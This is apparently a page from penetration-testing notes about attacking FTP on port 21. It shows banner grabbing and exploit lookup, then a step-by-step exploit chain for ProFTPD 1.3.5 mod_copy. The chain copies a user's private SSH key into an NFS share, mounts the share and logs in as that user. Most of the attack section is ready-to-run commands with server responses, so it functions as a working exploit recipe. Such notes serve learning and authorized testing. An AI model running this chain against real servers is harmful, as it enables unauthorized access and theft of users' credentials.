21 - ftp

Enumeration

Use netcat to banner grab FTP version

nc $IP 21

Use searchsploit to find exploits from exploit-db on FTP version

searchsploit ftp 1.2.3

Exploitation examples

ProFTPD 1.3.5 mod_copy

ProFTPD 1.3.5 has a vulnerability within mod_copy module, which allows to use SITE CPFR and SITE CPTO commands commands via netcat to copy files. Within this example we will chain this exploit to copy Bobo's SSH keys to a misconfigured NFS share, then mount the share on our attack machine allowing access to the SSH keys.

# Use netcat to copy the file into a NFS share(s)
nc $IP 21
# 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [<IP>]
SITE CPFR /home/bob/.ssh/id_rsa
# 350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
# 250 Copy sucessful

# Mount the nfs share and get bob's keys
mkdir nfs
sudo mount $IP:/var nfs
cp nfs/tmp/id_rsa id_rsa
sudo umount nfs

# Use SSH to log into a host
chmod 600 id_rsa
ssh -i id_rsa bob@$IP
Previous53 - DNSNext139,445 - SMB

Last updated